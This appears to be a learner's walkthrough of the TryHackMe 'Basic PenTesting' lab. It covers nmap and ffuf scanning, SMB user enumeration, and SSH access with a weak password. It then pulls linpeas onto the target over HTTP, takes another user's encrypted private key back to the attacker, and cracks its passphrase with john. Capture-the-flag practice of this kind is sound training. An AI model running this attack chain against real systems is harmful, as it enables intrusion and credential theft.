Basic PenTesting

#rooms #THM #machines

Connecting

First download the vpn connection file from here to connect to the THM network

sudo openvpn <path to the vpnfile>

Scanning

Performing a basic and simple nmap scan

$ nmap -sT 10.10.4.175
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-04 08:17 +03
Nmap scan report for 10.10.4.175
Host is up (0.086s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8009/tcp open  ajp13
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 4.44 seconds

we have some open services one of them is http lets check it

the source code has nothing useful but a simple note

<html>

<h1>Undergoing maintenance</h1>

<h4>Please check back later</h4>

<!-- Check our dev note section if you need to know what to work on. -->

</html>

lets search for hidden directories using ffuf

└──╼ $ffuf -u http://10.10.215.23/FUZZ -w ~/SecLists/Discovery/Web-Content/common.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.215.23/FUZZ
 :: Wordlist         : FUZZ: /home/ahm4d_312/SecLists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.htpasswd               [Status: 403, Size: 296, Words: 22, Lines: 12, Duration: 133ms]
.htaccess               [Status: 403, Size: 296, Words: 22, Lines: 12, Duration: 133ms]
.hta                    [Status: 403, Size: 291, Words: 22, Lines: 12, Duration: 140ms]
development             [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 122ms]
index.html              [Status: 200, Size: 158, Words: 20, Lines: 11, Duration: 171ms]
server-status           [Status: 403, Size: 300, Words: 22, Lines: 12, Duration: 119ms]
:: Progress: [4739/4739] :: Job [1/1] :: 366 req/sec :: Duration: [0:00:14] :: Errors: 0 ::

we found a directory named development lets check it

we see two files here so we have to check them

from this one we got a version that we might need 2.5.12

we see in this note that a member named J received a msg that tells him to change his password because it was cracked very easily we have to note this

scan the SMB server

now we use enum4linux to enumerate the SMB server

$ enum4linux -a 10.10.215.23                                                                                     
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Mar  5 09:02:55 2025    
<snip>..
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

we found two users jan and kay

Gaining Access

going back to this note looks like the J is jan and K is kay, so jan might have a weak password that we can crack

we have obtained the password of jan so we can now ssh to the machine and get Initial Foothold, then we can start an http server to transfer a script named linpeas to enumerate the system.

#on our machine
$ python3 -m http.server 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.215.23 - - [05/Mar/2025 09:12:24] "GET /linpeas.sh HTTP/1.1" 200 -

#on the target machine after ssh to it
jan@basic2:/tmp$ wget http://10.21.113.202:8000/linpeas.sh
--2025-03-05 01:13:28--  http://10.21.113.202:8000/linpeas.sh
Connecting to 10.21.113.202:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 829700 (810K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh                   100%[=============================================>] 810.25K   469KB/s    in 1.7s    

2025-03-05 01:13:30 (469 KB/s) - 'linpeas.sh' saved [829700/829700]

jan@basic2:/tmp$ chmod +x linpeas.sh 
jan@basic2:/tmp$ ./linpeas.sh 
<..snip..>
══════════╣ Analyzing SSH Files (limit 70)                                                                        
                                                                                                                   
-rw-r--r-- 1 kay kay 3326 Apr 19  2018 /home/kay/.ssh/id_rsa                                                       
-----BEGIN RSA PRIVATE KEY-----                                                                                    
Proc-Type: 4,ENCRYPTED                                                                                             
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75                                                             
IoNb/J0q2Pd56EZ23oAaJxLvhuSZ1crRr4ONGUAnKcRxg3+9vn6xcujpzUDuUtlZ                                                   
o9dyIEJB4wUZTueBPsmb487RdFVkTOVQrVHty1K2aLy2Lka2Cnfjz8Llv+FMadsN                                                   
XRvjw/HRiGcXPY8B7nsA1eiPYrPZHIH3QOFIYlSPMYv79RC65i6frkDSvxXzbdfX   
<..snip..>

after running linpeas we found a private ssh key for kay, located at /home/kay/.ssh which can be used to login as kay, using the same way we transferred linpeas we can transfer id_rsa back to our machine then ssh to kay using it, when we try to ssh as kay it asks for passphrase of the key private key so we need to brute-force it using a tool named john the ripper we do this as follows

#transsfer the key to our machine
jan@basic2:/tmp$ cd /home/kay/.ssh
jan@basic2:/home/kay/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub
jan@basic2:/home/kay/.ssh$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 ...

#using john the ripper to find the passphrase of the private key
$ wget http://10.10.215.23:8000/id_rsa
<..sinp..>
$ /usr/bin/ssh2john id_rsa > id_rsa_hash #to change it to a format the john the ripper can understand
$ john id_rsa_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 
$john --show id_rsa_hash.txt 
id_rsa:be...

now we can ssh to kay and get the final password

cat pass.bak
heresareallystrongpassword...

and that's it

Happy hacking :D